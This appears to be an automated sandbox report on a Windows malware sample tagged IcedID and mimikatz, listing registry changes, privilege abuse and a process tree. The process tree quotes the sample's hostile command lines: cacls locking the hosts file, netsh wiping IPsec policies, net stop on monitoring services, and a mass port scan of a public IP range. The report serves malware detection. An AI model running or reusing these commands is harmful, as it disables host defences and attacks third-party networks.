gyggue.execmd.execmd.exenet.exenetsh.exenetsh.execmd.exelkinngyeb.exenetsh.exenet.exenet1.exenetsh.execmd.exenet1.exenetsh.execacls.execmd.execmd.execacls.exenet.execmd.execmd.execmd.exenet.exenet1.exeschtasks.exenetsh.exenetsh.exenetsh.exesc.exenet.exenet1.execmd.execmd.execmd.execmd.exevrguwycnn.execmd.exenetsh.execmd.exe2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.execmd.execacls.exewpcap.exeschtasks.exenetsh.exesc.exenetsh.execmd.exenet.exenet1.exenet.exenetsh.exenet1.exenet1.exenet1.exenetsh.exenetsh.execmd.execmd.execmd.execmd.execmd.exexohudmc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gyggue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lkinngyeb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vrguwycnn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 4192 cmd.exe 3872 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000b000000023b89-7.dat nsis_installer_2 behavioral2/files/0x0013000000023bbe-15.dat nsis_installer_1 behavioral2/files/0x0013000000023bbe-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
nbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exebmesabc.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe -
Modifies registry class 14 IoCs
Processes:
bmesabc.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bmesabc.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 4588 schtasks.exe 3284 schtasks.exe 1908 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bmesabc.exepid Process 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exepid Process 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exebmesabc.exebmesabc.exevfshost.exenbriuecau.exeysiisu.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exenbriuecau.exedescription pid Process Token: SeDebugPrivilege 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3364 bmesabc.exe Token: SeDebugPrivilege 4104 bmesabc.exe Token: SeDebugPrivilege 1536 vfshost.exe Token: SeDebugPrivilege 2096 nbriuecau.exe Token: SeLockMemoryPrivilege 696 ysiisu.exe Token: SeLockMemoryPrivilege 696 ysiisu.exe Token: SeDebugPrivilege 1596 nbriuecau.exe Token: SeDebugPrivilege 4920 nbriuecau.exe Token: SeDebugPrivilege 2100 nbriuecau.exe Token: SeDebugPrivilege 4608 nbriuecau.exe Token: SeDebugPrivilege 3660 nbriuecau.exe Token: SeDebugPrivilege 4784 nbriuecau.exe Token: SeDebugPrivilege 2956 nbriuecau.exe Token: SeDebugPrivilege 644 nbriuecau.exe Token: SeDebugPrivilege 220 nbriuecau.exe Token: SeDebugPrivilege 4156 nbriuecau.exe Token: SeDebugPrivilege 2816 nbriuecau.exe Token: SeDebugPrivilege 3372 nbriuecau.exe Token: SeDebugPrivilege 3988 nbriuecau.exe Token: SeDebugPrivilege 4632 nbriuecau.exe Token: SeDebugPrivilege 1692 nbriuecau.exe Token: SeDebugPrivilege 4384 nbriuecau.exe Token: SeDebugPrivilege 3972 nbriuecau.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exebmesabc.exebmesabc.exexohudmc.exegyggue.exebmesabc.exebmesabc.exepid Process 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 3364 bmesabc.exe 3364 bmesabc.exe 4104 bmesabc.exe 4104 bmesabc.exe 368 xohudmc.exe 1016 gyggue.exe 1908 bmesabc.exe 1908 bmesabc.exe 768 bmesabc.exe 768 bmesabc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.execmd.exebmesabc.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 756 wrote to memory of 4192 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 84 PID 756 wrote to memory of 4192 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 84 PID 756 wrote to memory of 4192 756 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 84 PID 4192 wrote to memory of 3872 4192 cmd.exe 87 PID 4192 wrote to memory of 3872 4192 cmd.exe 87 PID 4192 wrote to memory of 3872 4192 cmd.exe 87 PID 4192 wrote to memory of 3364 4192 cmd.exe 93 PID 4192 wrote to memory of 3364 4192 cmd.exe 93 PID 4192 wrote to memory of 3364 4192 cmd.exe 93 PID 4104 wrote to memory of 2744 4104 bmesabc.exe 96 PID 4104 wrote to memory of 2744 4104 bmesabc.exe 96 PID 4104 wrote to memory of 2744 4104 bmesabc.exe 96 PID 2744 wrote to memory of 640 2744 cmd.exe 98 PID 2744 wrote to memory of 640 2744 cmd.exe 98 PID 2744 wrote to memory of 640 2744 cmd.exe 98 PID 2744 wrote to memory of 4336 2744 cmd.exe 99 PID 2744 wrote to memory of 4336 2744 cmd.exe 99 PID 2744 wrote to memory of 4336 2744 cmd.exe 99 PID 2744 wrote to memory of 2636 2744 cmd.exe 100 PID 2744 wrote to memory of 2636 2744 cmd.exe 100 PID 2744 wrote to memory of 2636 2744 cmd.exe 100 PID 2744 wrote to memory of 4428 2744 cmd.exe 101 PID 2744 wrote to memory of 4428 2744 cmd.exe 101 PID 2744 wrote to memory of 4428 2744 cmd.exe 101 PID 2744 wrote to memory of 4572 2744 cmd.exe 102 PID 2744 wrote to memory of 4572 2744 cmd.exe 102 PID 2744 wrote to memory of 4572 2744 cmd.exe 102 PID 2744 wrote to memory of 1940 2744 cmd.exe 103 PID 2744 wrote to memory of 1940 2744 cmd.exe 103 PID 2744 wrote to memory of 1940 2744 cmd.exe 103 PID 4104 wrote to memory of 760 4104 bmesabc.exe 105 PID 4104 wrote to memory of 760 4104 bmesabc.exe 105 PID 4104 wrote to memory of 760 4104 bmesabc.exe 105 PID 4104 wrote to memory of 684 4104 bmesabc.exe 107 PID 4104 wrote to memory of 684 4104 bmesabc.exe 107 PID 4104 wrote to memory of 684 4104 bmesabc.exe 107 PID 4104 wrote to memory of 4492 4104 bmesabc.exe 109 PID 4104 wrote to memory of 4492 4104 bmesabc.exe 109 PID 4104 wrote to memory of 4492 4104 bmesabc.exe 109 PID 4104 wrote to memory of 3124 4104 bmesabc.exe 113 PID 4104 wrote to memory of 3124 4104 bmesabc.exe 113 PID 4104 wrote to memory of 3124 4104 bmesabc.exe 113 PID 3124 wrote to memory of 2292 3124 cmd.exe 115 PID 3124 wrote to memory of 2292 3124 cmd.exe 115 PID 3124 wrote to memory of 2292 3124 cmd.exe 115 PID 2292 wrote to memory of 1908 2292 wpcap.exe 116 PID 2292 wrote to memory of 1908 2292 wpcap.exe 116 PID 2292 wrote to memory of 1908 2292 wpcap.exe 116 PID 1908 wrote to memory of 4784 1908 net.exe 118 PID 1908 wrote to memory of 4784 1908 net.exe 118 PID 1908 wrote to memory of 4784 1908 net.exe 118 PID 2292 wrote to memory of 2656 2292 wpcap.exe 119 PID 2292 wrote to memory of 2656 2292 wpcap.exe 119 PID 2292 wrote to memory of 2656 2292 wpcap.exe 119 PID 2656 wrote to memory of 3232 2656 net.exe 121 PID 2656 wrote to memory of 3232 2656 net.exe 121 PID 2656 wrote to memory of 3232 2656 net.exe 121 PID 2292 wrote to memory of 3220 2292 wpcap.exe 122 PID 2292 wrote to memory of 3220 2292 wpcap.exe 122 PID 2292 wrote to memory of 3220 2292 wpcap.exe 122 PID 3220 wrote to memory of 4356 3220 net.exe 124 PID 3220 wrote to memory of 4356 3220 net.exe 124 PID 3220 wrote to memory of 4356 3220 net.exe 124 PID 2292 wrote to memory of 2948 2292 wpcap.exe 125
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2180
-
C:\Windows\TEMP\ilsrygknu\ysiisu.exe"C:\Windows\TEMP\ilsrygknu\ysiisu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bisbgtln\bmesabc.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3872
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3364
-
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:640
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4572
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1940
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:760
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:684
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4492
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\cuincnwui\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\tqgibwews\cuincnwui\wpcap.exeC:\Windows\tqgibwews\cuincnwui\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4784
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3232
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4356
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2308
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2608 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4336
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1872 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:5040 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4148
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tqgibwews\cuincnwui\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:868 -
C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exeC:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tqgibwews\cuincnwui\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1040
-
-
-
